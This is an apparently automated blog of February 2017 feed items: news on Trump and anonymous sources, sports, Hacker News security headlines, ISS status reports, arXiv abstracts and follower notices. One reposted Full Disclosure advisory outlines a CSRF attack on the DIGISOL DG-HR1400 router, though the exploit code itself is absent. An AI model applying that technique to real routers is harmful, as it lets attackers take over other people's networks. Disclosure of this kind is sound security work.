Latest YouTube Video

Saturday, February 25, 2017

Trump uses CPAC to attack news media's use of anonymous sources

President Trump used his address at the annual Conservative Political Action Conference in Maryland on Friday to intensify his attacks on journalists, ...

from Google Alert - anonymous http://ift.tt/2lWFZxv
via IFTTT

Oregon House Debates Whether To Ban Anonymous Bills

Members of the Oregon House are considering a proposal to ban the long-accepted practice of allowing members to introduce bills anonymously.

from Google Alert - anonymous http://ift.tt/2lbm8pQ
via IFTTT

The President Wants to Ban Anonymous Sources for News He Does Not Like

Trump's riff on leaks and anonymous sources took a darker turn today. Already last week he had asked the Justice Department to investigate “criminal ...

from Google Alert - anonymous http://ift.tt/2llJBW8
via IFTTT

Orioles: Michael Bourn expected to miss four weeks after suffering broken finger while catching a football (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Trump takes aim at use of anonymous sources

Trump takes aim at use of anonymous sources. Donald Trump used his first presidential appearance before the nation's largest gathering of ...

from Google Alert - anonymous http://ift.tt/2lRaEf5
via IFTTT

Google Does It Again: Discloses Unpatched Microsoft Edge and IE Vulnerability

This month has yet been kind of interesting for cyber security researchers, with Google successfully cracked SHA1 and the discovery of Cloudbleed bug in Cloudflare that caused the leakage of sensitive information across sites hosted behind Cloudflare. Besides this, Google last week disclosed an unpatched vulnerability in Windows Graphics Device Interface (GDI) library, which affects


from The Hacker News http://ift.tt/2layFJS
via IFTTT

I have a new follower on Twitter


Brian Brushwood
Host of Scam School for Discovery & Hacking The System for NatGeo. Two Billboard #1 comedy albums. Eats fire. Sticks nails in eyes. Jackass and...pro dancer?
Austin, TX
http://t.co/8V78mxE476
Following: 518628 - Followers: 1588650

February 25, 2017 at 06:31AM via Twitter http://twitter.com/shwood

Friday, February 24, 2017

Ravens awarded 3rd-round compensatory pick (No. 99 overall) in 2017 draft (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Fake news? President Trump takes aim at anonymous sources

President Trump takes aim at anonymous sources. Feb. 24, 2017 - 2:45 - Insight from Howard Kurtz, Fox News media analyst and host of 'MediaBuzz'.

from Google Alert - anonymous http://ift.tt/2musjXb
via IFTTT

[InsideNothing] hitebook.net liked your post "[FD] [ERPSCAN-16-036] SAP ASE ODATA SERVER - DENIAL OF SERVICE"



Source: Gmail -> IFTTT-> Blogger

Even though he bashes anonymous sources, Trump uses them himself

President Donald Trump used part of his speech at an annual gathering of conservatives today to take aim at reporters' use of anonymous sources, ...

from Google Alert - anonymous http://ift.tt/2lDPwZg
via IFTTT

Trump blasts media, anonymous sources

WASHINGTON (AP) — President Donald Trump unloaded on the news media Friday for using anonymous sources — just hours after members of his ...

from Google Alert - anonymous http://ift.tt/2lOABvZ
via IFTTT

Ravens: Rick Wagner could become NFL's second-highest paid RT; projected to make $6.9M per season - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

How to send anonymous responses?

You mean response to that survey you sent? Like when your users submit it, it is anonymous? If you set your Email Notifier without Sender and Email:.

from Google Alert - anonymous http://ift.tt/2mu4y1h
via IFTTT

Trump Slam's Media's Use of Anonymous Sources

President Trump “escalated his criticism of the news media Friday, taking direct aim this time at the use of anonymous sources,” the AP reports.

from Google Alert - anonymous http://ift.tt/2mg2NIQ
via IFTTT

'No anonymous sources,' Trump scolds — after WH uses them

WASHINGTON (AP) — Donald Trump used his first presidential appearance before the nation's largest gathering of conservative activists on Friday to ...

from Google Alert - anonymous http://ift.tt/2mtEGCT
via IFTTT

'No anonymous sources,' Trump demands, though White House uses them

The president has chafed at a number of anonymously sourced stories, including numerous reports describing contacts between his campaign ...

from Google Alert - anonymous http://ift.tt/2mfOzYr
via IFTTT

Writer

Writer in Experienced (non manager), General with ANONYMOUS. Apply Today.

from Google Alert - anonymous http://ift.tt/2mfHIyp
via IFTTT

Trump: 'Enemy Of The People' Media Makes Up Anonymous Sources

system 2017-02-24 15:53:24 UTC #1. Trump: 'Enemy Of The People' Media Makes Up Anonymous Sources Back to article ...

from Google Alert - anonymous http://ift.tt/2lDDiOG
via IFTTT

Temporary Accounts Assistant

Temporary Accounts Assistant in Accounting and public practice, Accounts assistant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2mfCYZq
via IFTTT

Clipped from Burlington Hawk Eye Gazette May 24, 1948

People in 05/24/1948 Advertisement clipping : Ann Swann, Charles Ruberg, Don Meloan, Eileen Nolan, Fisher, Mcconnell, Peters, Rosalie Peters ...

from Google Alert - anonymous http://ift.tt/2lDBzci
via IFTTT

Hacker Shows How Easy It Is To Hack People While Walking Around in Public

Wi-Fi enabled devices — widely known as the Internet of Things (IoT) — are populating offices and homes in greater and greater numbers. From smartphones to connected printers and even coffee makers, most of these IoT devices have good intentions and can connect to your company's network without a problem. However, as the Internet of Things (IoT) devices are growing at a great pace, they


from The Hacker News http://ift.tt/2lN3MPT
via IFTTT

ISS Daily Summary Report – 2/23/2017

66 Progress (66P) Launch: All 66P systems are performing nominally. One rendezvous maneuver, DV3, was performed nominally earlier today. Checkouts of the Progress TORU system and the Progress TV system 9 have been completed with nominal results. Docking is scheduled for Friday, February 24th at 2:35 am CST. SpaceX (SpX)-10 Capture: After yesterday’s aborted rendezvous, a successful re-rendezvous and capture was performed this morning. The crew monitored the SpaceX-10 Dragon approach from the Cupola Robotic Workstation (RWS) Dragon vehicle was captured using the Space Station Remote Manipulator System (SSRMS) at 04:44 am CST today. Robotics Ground Controllers then used the SSRMS to maneuver the Dragon to and install it on the Node-2 Nadir Active Common Berthing Mechanism (CBM). This afternoon, the crew performed vestibule outfitting, CBM Control Panel Assembly (CPA) removal, and ingressed the vehicle. After ingress, the crew removed the Center Stack then retrieved and unpacked the Dragon Cargo Transfer Bag (CTB) and Double Coldbags. The Space Automated Bioproduct Laboratory (SABL) CO2 Incubator Installation and the Merlin Hardware Setup were done in preparation for Microgravity Extended Stem Cells (MESC) operations scheduled for early tomorrow. Installation of TangoLab Card Cube Replace, NanoRacks Mod9 Ops, Low Temperature (LT) Protein Crystal Growth (PCG) Sample Preparation and NanoRacks Module-71 were also performed. NanoRacks Module 9: The crew retrieved the NanoRacks Module-9 from SpX-10 and activated five tubes of Student Spaceflight Experiments Program (SSEP)/National Center for Earth and Space Science Education (NCESSE) experiments. Supporting various schools and student designed experiments studying a range of objectives, the SSEP lets students design experiments that address real challenges of living and working in space. The program also is a key initiative for U.S. science, technology, engineering and math (STEM) education, educating and inspiring the next generation of scientists and engineers to work on the space program. Additionally, findings from student experiments such as those on bacteria growth, cell biology, food production and preservation, water quality, and seed and plant studies contribute to future experiments to benefit the space program. The following experiments were activated today: The Effects of Microgravity on Muscle Tissue Regeneration (McNair Academic High School, Grade 12, Jersey City, NJ) Shewanella oneidensis and Iron Ions in Microgravity (Bullis School, Grade 10, Potomac, MD) The Effect of Microgravity on Preservation of Spam Using Lemon Juice (Lincoln Middle School, Grade 8, Santa Monica, CA) Kidney Stone Conundrum (The Academy at Nola Dunn, Grade 5, Burleson, TX) Microgravity’s Effects on the Turbidity of a Fluid Mixture of Cornstarch and Water (W.J. Keenan High School, Grade 9, Columbia, SC) JAXA Low Temperature Protein Crystal Growth (LT PCG): The crew removed the samples from the Freezer-Refrigerator Of STirling cycle (FROST) then initiated the crystal growth. The crew activated the three different crystal sample containers then returned them to the FROST to maintain the optimal growth temperature of 4 degrees Celsius. The goal of the JAXA LT PCG experiment is to make high quality protein crystals under microgravity environmental conditions. Once growth is completed, the LT PCG experiment will be returned on SpX-10 for ground team evaluation and analysis.  NanoRacks Module-71/Platform 1 Installation: The crew installed NanoRacks Module-71 into Platform 1.  Module-71 contains two plant growth experiments that will run onboard the ISS in the Platform-1 facility through the end of the SpX-10 mission.  Module-71 contains two plant growth experiments, NanoRacks-Valley Christian High School-BAM-FX– Enhanced Broccoli Seed Germination, Plant Growth and Zinc Biofortification on Orbit (NanoRacks-VCHS-BAM-FX) and NanoRacks-Edith Stein School-Vegetative Propagation of Plants in Orbit (V3PO), that aim to investigate the capability for production of large quantities of high quality vegetables on a space station. Results from the experiment will aid researchers in developing methods to provide astronauts a continuous supply of fresh vegetables on long missions. NanoRacks-VCHS-BAM-FX studies the growth of broccoli plants fortified with zinc, looking at seed germination and growth in microgravity, determining whether a bioavailable mineral nutrient formula will help plant growth.  The team responsible for V3PO is interested in vegetative plant propagation versus seeded propagation. In vegetative growth (cuttings) the desired characteristics are passed to subsequent generations of plants and ensures a uniform crop even when a few viable seeds are produced.   Payload Card-X: The crew retrieved the inserts from SpX-10 and installed them into the TangoLab facility. The inserts on Payload Card-X cover a wide spectrum of studies including: Flatworms2.0: Follow up study to original flatworm regeneration study on SpX-5. Will include video and feeding capability.   Smooth Muscle Cell Stimulus Response: Study of — cell line after cultured in microgravity for 4 days will be hit with reagent then acetone to video response. Tissue Mimetic: Looking at diffusion rates of different molecular compounds in tissue proxy. Precursor to advanced tissue cultures.   Methanogen Growth Characterization: Comparison of growth curves between Earth and microgravity of Methanogens. Arabidopsis Study (Education): Arabidopsis study will be networked with real time control units in classrooms in San Francisco area of California. Precursor to larger undertaking with more schools on SpX-11 mission.  Pharmaceutical Compound Generation:  Madagascar Periwinkle and Valeriana plants will be germinated on orbit to looking at mutation and generation of compounds used in synthesis of chemotherapies. Today’s Planned Activities All activities are on schedule unless otherwise noted. Crew Command Panel (CCP) Cable Route and Checkout Closing Shutters on windows 6, 8, 12, 13, 14. Photo/TV Ghost Camera in Cuopla on SSC power recording Inventory Management System (IMS) conference Robotic Workstation (RWS) High Definition (HD) Monitor Downlink Robotics Workstation (RWS) Dragon Configuration CARDIOVECTOR. Experiment Ops Dragon R Bar Approach DUBRAVA. Video of VSS P/L screen CARDIOVECTOR. Experiment Ops. BIOPLENKA. Installation of Cryogem-03 Space Station Remote Manipulator System (SSRMS) Dragon Capture BIOPLENKA. Removal of ТБУ-В No.04 Thermostat Remote Workstation Monitor HD Video Downlink Deactivation RWS. Ghost camera teardown in Cupola PRODUTSENT. ТБУ-В No.2 Incubator Setup Photo TV High Definition (HD) Cygnus Video Setup MICROVIR. Glovebox-S Setup Air Heater Fan (БВН) Screen Cleaning in Soyuz 732 NanoRacks Module-9 OBT Vacuum Cleaning area behind panels 405, 406 and MRM1 Interior Video recording Crew Command Panel (CCP) Cable Deroute Water Recovery System (WRS) Waste […]

from ISS On-Orbit Status Report http://ift.tt/2mkEZAu
via IFTTT

Royal gets anonymous $6M gift

Royal gets anonymous $6M gift. Ottawa Citizen - 2017-02-24 - CITY - MEGAN HARRISON. The Royal Mental Health Centre said Thursday it's hoping ...

from Google Alert - anonymous http://ift.tt/2msCcV9
via IFTTT

I have a new follower on Twitter


Karl Gusner
software engineer, entrepreneur, positive energizer. CTO & co-founder of @goodaudience, TechStars London. UC Berkeley & Google Alum.
Oakland, NYC, LA, London
http://t.co/jiiI2aiZ9s
Following: 19470 - Followers: 34906

February 24, 2017 at 05:46AM via Twitter http://twitter.com/kgesus

[FD] Multiple cross-site request forgery (CSRF) vulnerabilities in the DIGISOL (DG-HR 1400) Wireless Router

Title: ==== DIGISOL DG-HR1400 Wireless router – Cross-Site Request Forgery (CSRF) vulnerability Credit: ====== Name: Indrajith.A.N Website: http://ift.tt/2kISZqG Company: PwC-SDC Reference: ========= CVE Details: CVE-2017-6127 Date: ==== 23-02-2017 Vendor: ====== DIGISOL router is a product of Smartlink Network Systems Ltd. is one of India's leading networking company. It was established in the year 1993 to prop the Indian market in the field of Network Infrastructure. Product: ======= DIGISOL DG-HR1400 is a wireless Router Product link: http://ift.tt/2ls5tju Abstract: ======= Cross-Site Request Forgery (CSRF) vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.\ Affected Version: ============= <=1.00.02 Exploitation-Technique: =================== Remote Severity Rating: =================== 7.9 Details: ======= An attacker who lures a DG-HR1400 authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the SSID name, password, security type etc. Proof Of Concept: ================ 1) User login to DG-HR1400 wireless router 2) User visits the attacker's malicious web page (attack.html) 3) attack.html exploits CSRF vulnerability and changes the SSID name and password Exploit code (attack.html): Digisol Router CSRF Exploit - Indrajith A.N
Disclosure Timeline: ====================================== Vendor Notification: December 18, 2016

Source: Gmail -> IFTTT-> Blogger

[FD] Unicorn Emulator v1.0 is out!

Greetings, We are super happy to announce version 1.0 for Unicorn CPU Emulator framework! Full source code & precompiled binaries are now available at http://ift.tt/2lBA3XZ This release is the result of over 1 year of community-based development. We fixed a lot of issues on all architectures, added some new APIs and provide 3 more bindings in Haskell, MSVC & VB6 now. See the link above for details on important changes. Huge thanks to all the heroic contributors who worked so hard make this release possible! Finally, don't forget to check out a list of excited security tools built on top of Unicorn - by community - at http://ift.tt/2mk6das Cheers, Quynh http://ift.tt/1Scrjlb http://ift.tt/18OQOjV http://ift.tt/1KJ3yxs

Source: Gmail -> IFTTT-> Blogger

[FD] Advisory X41-2017-004: Multiple Vulnerabilities in tnef

X41 D-Sec GmbH Security Advisory: X41-2017-004 Multiple Vulnerabilities in tnef ================================ Overview

Source: Gmail -> IFTTT-> Blogger

Cloudbleed: Serious Bug Exposes Sensitive Data From Sites Sitting Behind CloudFlare

A severe security vulnerability has been discovered in the CloudFlare content delivery network that has caused big-name websites to expose private session keys and other sensitive data. CloudFlare, a content delivery network (CDN) and web security provider that helps optimize safety and performance of over 5.5 Million websites on the Internet, is warning its customers of the critical bug that


from The Hacker News http://ift.tt/2lgkbJx
via IFTTT

I have a new follower on Twitter


CrowdFundingExposure
Visit https://t.co/P3qDBpCQIg today get your campaign promoted on Twitter to 2,940,000+ & Facebook 615,000+ Donors, Investors, & Angels
USA Canada UK EU Australia
https://t.co/P3qDBpCQIg
Following: 56279 - Followers: 58920

February 24, 2017 at 04:28AM via Twitter http://twitter.com/zipfunding

I have a new follower on Twitter


Jennifer Greene
Social media marketing made easier. You don't have to be great to start, but you do have to start to be great. http://t.co/9betEcwJIV
Escondido, CA
https://t.co/m7Ewej5rxA
Following: 15470 - Followers: 19668

February 24, 2017 at 03:46AM via Twitter http://twitter.com/TyrannosaurJen

I have a new follower on Twitter


Harjinder S Kukreja
Social Activist | Traveller | Influencer | Foodie | Restaurateur | Chocolatier | Sikh | News | Gadgets | Ludhiana | Punjab | IG: harjinderkukreja (verified)
Ludhiana, Punjab
https://t.co/fWrBDzW5oA
Following: 332410 - Followers: 383118

February 24, 2017 at 02:56AM via Twitter http://twitter.com/SinghLions

California Gets Slammed Again

California has been experiencing a drought since 2012, but the first months of 2017 have brought some relief in the form of torrential rains. These rains have been brought to California in a series of atmospheric rivers, long narrow channels of water vapor in the atmosphere that reach from tropical latitudes to the coast of California. These channels bring rainfall to the state when they are distrupted by atmospheric conditions over California's eastern mountains. This visualization of atmospheric water vapor and precipitation during the first three months of February clearly show the successive atmospheric rivers and the resulting rainfall.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2lQAQXw
via IFTTT

Anonymous 2

Add-on Information for <span itemprop="itemreviewed">Anonymous 2</span>. Updated, February 24, 2017. Artist, Dom974. Rating. Not yet rated.

from Google Alert - anonymous http://ift.tt/2lfLbJe
via IFTTT

Thursday, February 23, 2017

Awesome Mardi Gras moment: Boy finds $100 in Nyx purse, anonymous note to

In the moment it is flying in your direction, every Mardi Gras throw can seem like an object of great value.

from Google Alert - anonymous http://ift.tt/2mj3Bte
via IFTTT

A Realistic Dataset for the Smart Home Device Scheduling Problem for DCOPs. (arXiv:1702.06970v1 [cs.AI])

The field of Distributed Constraint Optimization has gained momentum in recent years thanks to its ability to address various applications related to multi-agent cooperation. While techniques to solve Distributed Constraint Optimization Problems (DCOPs) are abundant and have matured substantially since the field inception, the number of DCOP realistic applications and benchmark used to asses the performance of DCOP algorithms is lagging behind. To contrast this background we (i) introduce the Smart Home Device Scheduling (SHDS) problem, which describe the problem of coordinating smart devices schedules across multiple homes as a multi-agent system, (ii) detail the physical models adopted to simulate smart sensors, smart actuators, and homes environments, and (iii) introduce a DCOP realistic benchmark for SHDS problems.



from cs.AI updates on arXiv.org http://ift.tt/2lf4J0c
via IFTTT

Theoretical and Experimental Analysis of the Canadian Traveler Problem. (arXiv:1702.07001v1 [cs.AI])

Devising an optimal strategy for navigation in a partially observable environment is one of the key objectives in AI. One of the problem in this context is the Canadian Traveler Problem (CTP). CTP is a navigation problem where an agent is tasked to travel from source to target in a partially observable weighted graph, whose edge might be blocked with a certain probability and observing such blockage occurs only when reaching upon one of the edges end points. The goal is to find a strategy that minimizes the expected travel cost. The problem is known to be P$\#$ hard. In this work we study the CTP theoretically and empirically. First, we study the Dep-CTP, a CTP variant we introduce which assumes dependencies between the edges status. We show that Dep-CTP is intractable, and further we analyze two of its subclasses on disjoint paths graph. Second, we develop a general algorithm Gen-PAO that optimally solve the CTP. Gen-PAO is capable of solving two other types of CTP called Sensing-CTP and Expensive-Edges CTP. Since the CTP is intractable, Gen-PAO use some pruning methods to reduce the space search for the optimal solution. We also define some variants of Gen-PAO, compare their performance and show some benefits of Gen-PAO over existing work.



from cs.AI updates on arXiv.org http://ift.tt/2lLvNaj
via IFTTT

Proactive Resource Management in LTE-U Systems: A Deep Learning Perspective. (arXiv:1702.07031v1 [cs.IT])

LTE in unlicensed spectrum (LTE-U) is a promising approach to overcome the wireless spectrum scarcity. However, to reap the benefits of LTE-U, a fair coexistence mechanism with other incumbent WiFi deployments is required. In this paper, a novel deep learning approach is proposed for modeling the resource allocation problem of LTE-U small base stations (SBSs). The proposed approach enables multiple SBSs to proactively perform dynamic channel selection, carrier aggregation, and fractional spectrum access while guaranteeing fairness with existing WiFi networks and other LTE-U operators. Adopting a proactive coexistence mechanism enables future delay-intolerant LTE-U data demands to be served within a given prediction window ahead of their actual arrival time thus avoiding the underutilization of the unlicensed spectrum during off-peak hours while maximizing the total served LTE-U traffic load. To this end, a noncooperative game model is formulated in which SBSs are modeled as Homo Egualis agents that aim at predicting a sequence of future actions and thus achieving long-term equal weighted fairness with WLAN and other LTE-U operators over a given time horizon. The proposed deep learning algorithm is then shown to reach a mixed-strategy Nash equilibrium (NE), when it converges. Simulation results using real data traces show that the proposed scheme can yield up to 28% and 11% gains over a conventional reactive approach and a proportional fair coexistence mechanism, respectively. The results also show that the proposed framework prevents WiFi performance degradation for a densely deployed LTE-U network.



from cs.AI updates on arXiv.org http://ift.tt/2miqpJL
via IFTTT

A DIKW Paradigm to Cognitive Engineering. (arXiv:1702.07168v1 [cs.AI])

Though the word cognitive has a wide range of meanings we define cognitive engineering as learning from brain to bolster engineering solutions. However, giving an achievable framework to the process towards this has been a difficult task. In this work we take the classic data information knowledge wisdom (DIKW) framework to set some achievable goals and sub-goals towards cognitive engineering. A layered framework like DIKW aligns nicely with the layered structure of pre-frontal cortex. And breaking the task into sub-tasks based on the layers also makes it easier to start developmental endeavours towards achieving the final goal of a brain-inspired system.



from cs.AI updates on arXiv.org http://ift.tt/2lfbcIo
via IFTTT

Ontologies in System Engineering: a Field Report. (arXiv:1702.07193v1 [cs.AI])

In recent years ontologies enjoyed a growing popularity outside specialized AI communities. System engineering is no exception to this trend, with ontologies being proposed as a basis for several tasks in complex industrial implements, including system design, monitoring and diagnosis. In this paper, we consider four different contributions to system engineering wherein ontologies are instrumental to provide enhancements over traditional ad-hoc techniques. For each application, we briefly report the methodologies, the tools and the results obtained with the goal to provide an assessment of merits and limits of ontologies in such domains.



from cs.AI updates on arXiv.org http://ift.tt/2lxeSYV
via IFTTT

A Probabilistic Framework for Location Inference from Social Media. (arXiv:1702.07281v1 [cs.AI])

We study the extent to which we can infer users' geographical locations from social media. Location inference from social media can benefit many applications, such as disaster management, targeted advertising, and news content tailoring. In recent years, a number of algorithms have been proposed for identifying user locations on social media platforms such as Twitter and Facebook from message contents, friend networks, and interactions between users. In this paper, we propose a novel probabilistic model based on factor graphs for location inference that offers several unique advantages for this task. First, the model generalizes previous methods by incorporating content, network, and deep features learned from social context. The model is also flexible enough to support both supervised learning and semi-supervised learning. Second, we explore several learning algorithms for the proposed model, and present a Two-chain Metropolis-Hastings (MH+) algorithm, which improves the inference accuracy. Third, we validate the proposed model on three different genres of data - Twitter, Weibo, and Facebook - and demonstrate that the proposed model can substantially improve the inference accuracy (+3.3-18.5% by F1-score) over that of several state-of-the-art methods.



from cs.AI updates on arXiv.org http://ift.tt/2lLle7i
via IFTTT

Moving Beyond the Turing Test with the Allen AI Science Challenge. (arXiv:1604.04315v3 [cs.AI] UPDATED)

Given recent successes in AI (e.g., AlphaGo's victory against Lee Sedol in the game of GO), it's become increasingly important to assess: how close are AI systems to human-level intelligence? This paper describes the Allen AI Science Challenge---an approach towards that goal which led to a unique Kaggle Competition, its results, the lessons learned, and our next steps.



from cs.AI updates on arXiv.org http://ift.tt/1r7Yz4K
via IFTTT

Transferring Face Verification Nets To Pain and Expression Regression. (arXiv:1702.06925v1 [cs.CV])

Limited annotated data is available for the research of estimating facial expression intensities, which makes the training of deep networks for automated expression assessment very challenging. Fortunately, fine-tuning from a data-extensive pre-trained domain such as face verification can alleviate the problem. In this paper, we propose a transferred network that fine-tunes a state-of-the-art face verification network using expression-intensity labeled data with a regression layer. In this way, the expression regression task can benefit from the rich feature representations trained on a huge amount of data for face verification. The proposed transferred deep regressor is applied in estimating the intensity of facial action units (2017 EmotionNet Challenge) and in particular pain intensity estimation (UNBS-McMaster Shoulder-Pain dataset). It wins the second place in the challenge and achieves the state-of-the-art performance on Shoulder-Pain dataset. Particularly for Shoulder-Pain with the imbalance issue of different pain levels, a new weighted evaluation metric is proposed.



from cs.AI updates on arXiv.org http://ift.tt/2l1H1DT
via IFTTT

I have a new follower on Twitter


OMiga
A simple yet world class financial & accounting, payroll, HR, and corporate records management services for your business. We are your office engine.
St Louis, MO
https://t.co/XM5rJwZ8on
Following: 5620 - Followers: 5967

February 23, 2017 at 06:41PM via Twitter http://twitter.com/OMigaEngine

Management Accountant (Dealership)

Management Accountant (Dealership) in Accounting and public practice, Management accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwVxXx
via IFTTT

Financial Controller

Financial Controller in Accounting and public practice, Financial controller with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2mihfgy
via IFTTT

Chartered Accountant

Chartered Accountant in Accounting and public practice, Accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwWXBp
via IFTTT

Commercial Accountant

Commercial Accountant in Accounting and public practice, Commercial accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2migqUY
via IFTTT

Payroll and Bookkeeper

Payroll and Bookkeeper in Accounting and public practice, Accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwKwFQ
via IFTTT

Senior Finance Manager

Senior Finance Manager in Accounting and public practice, Finance manager with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2miklkl
via IFTTT

Senior Management Accountant

Senior Management Accountant in Accounting and public practice, Management accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwRkTV
via IFTTT

Interim Payroll Manager

Interim Payroll Manager in Accounting and public practice, Accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2migYtK
via IFTTT

Management Accounts Assistant

Management Accounts Assistant in Accounting and public practice, Accounts assistant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwLhhU
via IFTTT

Financial Controller, Nottingham

Financial Controller, Nottingham in Accounting and public practice, Financial controller with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2mihhVE
via IFTTT

Accountant

Accountant in Accounting and public practice, Accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwNp9m
via IFTTT

Year End Accountant

Year End Accountant in Accounting and public practice, Accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2mi6MBz
via IFTTT

Finance Manager

Finance Manager in Accounting and public practice, Finance manager with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwOfTz
via IFTTT

Payroll Manager

Payroll Manager in Accounting and public practice, Accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2mikl3P
via IFTTT

Management Accountant

Management Accountant in Accounting and public practice, Management accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwQW7W
via IFTTT

5 Colour Socks

These mid-calf 5 Colour Socks are made in Japan from a multicoloured cotton mix. The mid-weight socks from Anonymous Ism are finished with an ...

from Google Alert - anonymous http://ift.tt/2mihFmZ
via IFTTT

Payroll / Assistant Accountant

Payroll / Assistant Accountant in Accounting and public practice, Assistant accountant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwZ7RD
via IFTTT

Group Financial Controller

Group Financial Controller in Accounting and public practice, Financial controller with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2migp3m
via IFTTT

Junior Accounts Assistant

Junior Accounts Assistant in Accounting and public practice, Accounts assistant with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2lwM5U0
via IFTTT

Junior Finance Manager

Junior Finance Manager in Accounting and public practice, Finance manager with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2mixv0L
via IFTTT

I have a new follower on Twitter


Towson Makerspace



Following: 21 - Followers: 0

February 23, 2017 at 05:46PM via Twitter http://twitter.com/towsonmaker

Ravens might release Dennis Pitta over his $5.5M salary, but salary-cap relief wouldn't come immediately - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Hacker Who Knocked Million Routers Offline Using MIRAI Arrested at London Airport

British police have arrested a suspect in connection with the massive attack on Deutsche Telekom that hit nearly 1 Million routers last November. Late last year, someone knocked down more than 900,000 broadband routers belonging to Deutsche Telekom users in Germany, which affected the telephony, television, and internet service in the country. Now, Germany's federal criminal police force (


from The Hacker News http://ift.tt/2l49lp0
via IFTTT

Google achieved First-Ever Successful SHA-1 Collision Attack

SHA-1, Secure Hash Algorithm 1, a very popular cryptographic hashing function designed in 1995 by the NSA, is officially dead after a team of researchers from Google and the CWI Institute in Amsterdam announced today submitted the first ever successful SHA-1 collision attack. SHA-1 was designed in 1995 by the National Security Agency (NSA) as a part of the Digital Signature Algorithm. Like


from The Hacker News http://ift.tt/2lzBqGt
via IFTTT

ISS Daily Summary Report – 2/22/2017

66 Progress (66P) Launch: 66P launched successfully from Baikonur, Kazakhstan on Tuesday at 11:23 pm CST with nominal ascent. Docking is scheduled for Friday, February 24th at 2:36 am CST. SpaceX (SpX)-10 Capture: This morning’s rendezvous was aborted as a result of a bad ISS state vector being uplinked to the Dragon vehicle.  The SpaceX team is in the process of analyzing the cause of this bad state vector and how to prevent this in the future.  The ISS and SpaceX teams are preparing to perform a re-rendezvous tomorrow, February 23rd.  Capture is tentatively planned for 11:00 GMT (5:00 am CST).  Crew Day:  As a result of the aborted SpX-10 capture, ground teams have elected to make today an off-duty day for the USOS crew.  As part of their off duty time today the crew performed their routine weekend housekeeping activities, since Saturday will now be a crew work day.  Fluids Integrated Rack (FIR) White Light Cable Swap: The crew performed a swap of the White Light Fiber Optic (F/O) moving the cable from one light source to the other. The light from the FIR White Light Lamps is transmitted through the cables to the Light Microscopy Module (LMM) microscope to provide lighting to the experiment sample. LMM Biophysics 1 (The Effect of Macromolecular Transport of Microgravity Protein Crystallization) launched on SpX-10. When installed, investigators will use the results from LMM Biophysics 1 to examine the movement of single protein molecules in microgravity. By studying the crystals of a higher quality that can be grown in microgravity, scientists will be able to better understand their structure and how they work. Today’s Planned Activities All activities were completed unless otherwise noted. Crew Off Duty [Replanned] Completed Task List Items Wanted Poster for Minature Exercise Device Power Cable [Item not found]  Ground Activities All activities were completed unless otherwise noted. Configure for Dragon capture Return to nominal configuration  Three-Day Look Ahead: [Note: replan of the next couple of days is in work] Thursday, 02/23: Dragon capture and berthing, Dragon/N2 Vestibule outfitting, Node 2 CPA Removal, Dragon Ingress, Dragon Center Stack transfer, Double Cold Bag unpack Friday, 02/24: 66P Dock, 66P ingress, 66P transfer operations, SABLE CO2 Incubator Install, TangoLab-1 card replace, MERLIN3 install, Polar 1 transfer and install, Glacier 3 transfer and install, MESC first microscope ops, Saturday, 02/25: RR-4 transfer QUICK ISS Status – Environmental Control Group:     Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Standby Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2lJdYss
via IFTTT

Clipped from Jewell Record May 15, 1947

People in 05/15/1947 Obituary Death Notice clipping : Bengta Svenson, Bloyd Iverson, Boyd, Clarence Nelson, Emmett Olson, Hilda Hanson, Jess ...

from Google Alert - anonymous http://ift.tt/2lImQij
via IFTTT

Infosys panel to probe anonymous letter

Infosys panel to probe anonymous letter ... committee is looking at a complaint letter by an anonymous whistle-blower sent to the stock exchanges.

from Google Alert - anonymous http://ift.tt/2kOQ3sp
via IFTTT

Clipping from Mason City Globe Gazette Tue, Nov 29, 1966

People in 11/29/1966 Obituary Death Notice clipping : Arthur Grahlman, Christena Kalkbren, Clint Chelders, Smith, Henry O'Connell, Leona Monroe, ...

from Google Alert - anonymous http://ift.tt/2laNPQb
via IFTTT

Wednesday, February 22, 2017

Clipping from Tripoli Leader Wed, Dec 14, 1960

People in 12/14/1960 Obituary Death Notice clipping.

